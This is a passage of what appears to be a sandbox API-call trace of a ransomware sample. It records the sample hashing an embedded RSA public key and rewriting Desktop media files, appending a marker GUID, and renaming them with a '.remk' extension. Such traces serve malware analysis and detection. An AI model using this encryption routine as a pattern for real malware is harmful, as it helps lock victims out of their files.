nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0xe152, lpOverlapped=0x0) returned 1 [0231.166] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.166] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0231.167] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.167] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.167] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0231.168] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0231.168] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0231.168] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0231.168] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0231.168] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0231.168] GetLastError () returned 0x0 [0231.168] SetLastError (dwErrCode=0x0) [0231.168] GetLastError () returned 0x0 [0231.168] SetLastError (dwErrCode=0x0) [0231.168] GetLastError () returned 0x0 [0231.168] SetLastError (dwErrCode=0x0) [0231.168] GetLastError () returned 0x0 [0231.168] SetLastError (dwErrCode=0x0) [0231.168] GetLastError () returned 0x0 [0231.168] SetLastError (dwErrCode=0x0) [0231.168] GetLastError () returned 0x0 [0231.168] SetLastError (dwErrCode=0x0) [0231.169] GetLastError () returned 0x0 [0231.169] SetLastError (dwErrCode=0x0) [0231.169] GetLastError () returned 0x0 [0231.169] SetLastError (dwErrCode=0x0) [0231.169] GetLastError () returned 0x0 [0231.169] SetLastError (dwErrCode=0x0) [0231.169] GetLastError () returned 0x0 [0231.169] SetLastError (dwErrCode=0x0) [0231.169] GetLastError () returned 0x0 [0231.169] SetLastError (dwErrCode=0x0) [0231.169] GetLastError () returned 0x0 [0231.169] SetLastError (dwErrCode=0x0) [0231.169] GetLastError () returned 0x0 [0231.169] SetLastError (dwErrCode=0x0) [0231.169] GetLastError () returned 0x0 [0231.169] SetLastError (dwErrCode=0x0) [0231.169] GetLastError () returned 0x0 [0231.169] SetLastError (dwErrCode=0x0) [0231.169] GetLastError () returned 0x0 [0231.169] SetLastError (dwErrCode=0x0) [0231.169] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0231.169] GetLastError () returned 0x0 [0231.169] SetLastError (dwErrCode=0x0) [0231.169] GetLastError () returned 0x0 [0231.170] SetLastError (dwErrCode=0x0) [0231.170] GetLastError () returned 0x0 [0231.170] SetLastError (dwErrCode=0x0) [0231.170] GetLastError () returned 0x0 [0231.170] SetLastError (dwErrCode=0x0) [0231.170] GetLastError () returned 0x0 [0231.170] SetLastError (dwErrCode=0x0) [0231.170] GetLastError () returned 0x0 [0231.170] SetLastError (dwErrCode=0x0) [0231.170] GetLastError () returned 0x0 [0231.170] SetLastError (dwErrCode=0x0) [0231.170] GetLastError () returned 0x0 [0231.170] SetLastError (dwErrCode=0x0) [0231.170] GetLastError () returned 0x0 [0231.170] CryptDestroyHash (hHash=0x31de170) returned 1 [0231.170] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0231.170] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0231.170] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0231.170] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0231.170] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0231.170] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0231.171] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0231.171] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0231.171] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xe150) returned 0x37b1b70 [0231.171] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0231.171] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0231.171] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0231.171] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0231.171] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0231.171] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0231.171] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7658 [0231.171] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edc98 [0231.171] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b76a0 [0231.171] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edcb0 [0231.171] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edce0 [0231.171] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edd88 [0231.171] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edcf8 [0231.172] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0231.172] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x65dd10 [0231.172] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x65dd10, Size=0x218) returned 0x325fd48 [0231.172] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x325d6d0 [0231.172] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edce0 | out: hHeap=0x630000) returned 1 [0231.172] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edcf8 | out: hHeap=0x630000) returned 1 [0231.172] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edd88 | out: hHeap=0x630000) returned 1 [0231.172] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0231.172] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d6d0 | out: hHeap=0x630000) returned 1 [0231.172] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edd88 [0231.172] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0231.172] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31edcf8 [0231.172] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0f28 [0231.172] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31edce0 [0231.172] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0231.172] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0231.172] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0231.172] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d69f0 [0231.172] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0231.172] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0231.172] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0231.172] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0231.172] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0231.172] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edcf8 | out: hHeap=0x630000) returned 1 [0231.172] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0231.172] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edce0 | out: hHeap=0x630000) returned 1 [0231.173] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0231.173] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0231.173] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edd88 | out: hHeap=0x630000) returned 1 [0231.173] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0231.173] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0231.173] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0231.173] GetCurrentThreadId () returned 0x314 [0231.173] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0231.173] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x697138 [0231.173] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0231.173] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0231.173] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x31a4298 [0231.173] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0231.173] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0231.173] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0231.173] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0231.173] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0231.173] GetCurrentThreadId () returned 0x314 [0231.173] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0231.173] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0231.173] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x65dd10 [0231.174] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0231.174] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0231.174] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0231.174] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0231.174] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0231.174] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0231.174] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0231.174] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5968 [0231.174] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0231.174] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0231.174] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0231.174] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edd88 [0231.174] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0231.174] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0231.174] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0231.174] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0231.174] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0231.175] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0231.175] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0231.175] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0231.175] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edce0 [0231.175] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xe152, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.175] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0231.176] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0231.176] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0231.176] CloseHandle (hObject=0x640) returned 1 [0231.183] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x31b3dd8 [0231.183] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x870) returned 0x37b1b70 [0231.183] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\AzVzcW.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\azvzcw.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\AzVzcW.mp4.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\azvzcw.mp4.remk")) returned 1 [0231.185] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa33730, ftCreationTime.dwHighDateTime=0x1d5de12, ftLastAccessTime.dwLowDateTime=0x43e13230, ftLastAccessTime.dwHighDateTime=0x1d5e5de, ftLastWriteTime.dwLowDateTime=0x43e13230, ftLastWriteTime.dwHighDateTime=0x1d5e5de, nFileSizeHigh=0x0, nFileSizeLow=0x5450, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bi2gofC9nKVEjCY.png", cAlternateFileName="BI2GOF~1.PNG")) returned 1 [0231.185] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5968 [0231.185] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0231.185] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bi2gofC9nKVEjCY.png") returned=".png" [0231.185] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bi2gofC9nKVEjCY.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bi2gofc9nkvejcy.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0231.185] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=21584) returned 1 [0231.185] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0231.188] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x542a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.188] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0231.189] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0231.189] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x5450, lpOverlapped=0x0) returned 1 [0231.190] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.190] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0231.190] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.190] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.190] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x695278) returned 1 [0231.191] CryptCreateHash (in: hProv=0x695278, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0231.191] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0231.191] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0231.191] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0231.191] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0231.191] GetLastError () returned 0x0 [0231.191] CryptDestroyHash (hHash=0x31de170) returned 1 [0231.191] CryptReleaseContext (hProv=0x695278, dwFlags=0x0) returned 1 [0231.191] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0231.191] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0231.191] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0231.191] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0231.191] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x65dd10, Size=0x218) returned 0x325fd48 [0231.192] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x325d6d0 [0231.192] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x5450, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.192] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0231.192] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0231.192] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0231.192] CloseHandle (hObject=0x640) returned 1 [0231.199] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0231.199] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x880) returned 0x37b1b70 [0231.199] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bi2gofC9nKVEjCY.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bi2gofc9nkvejcy.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bi2gofC9nKVEjCY.png.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bi2gofc9nkvejcy.png.remk")) returned 1 [0231.201] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9746620, ftCreationTime.dwHighDateTime=0x1d5daa7, ftLastAccessTime.dwLowDateTime=0x50f81e40, ftLastAccessTime.dwHighDateTime=0x1d5e06e, ftLastWriteTime.dwLowDateTime=0x50f81e40, ftLastWriteTime.dwHighDateTime=0x1d5e06e, nFileSizeHigh=0x0, nFileSizeLow=0x11ec0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cYR-e.avi", cAlternateFileName="")) returned 1 [0231.201] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5968 [0231.201] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x693330 [0231.201] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cYR-e.avi") returned=".avi" [0231.201] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cYR-e.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cyr-e.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0231.201] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=73408) returned 1 [0231.202] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0231.204] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x11e9a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.204] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0231.206] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0231.206] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, 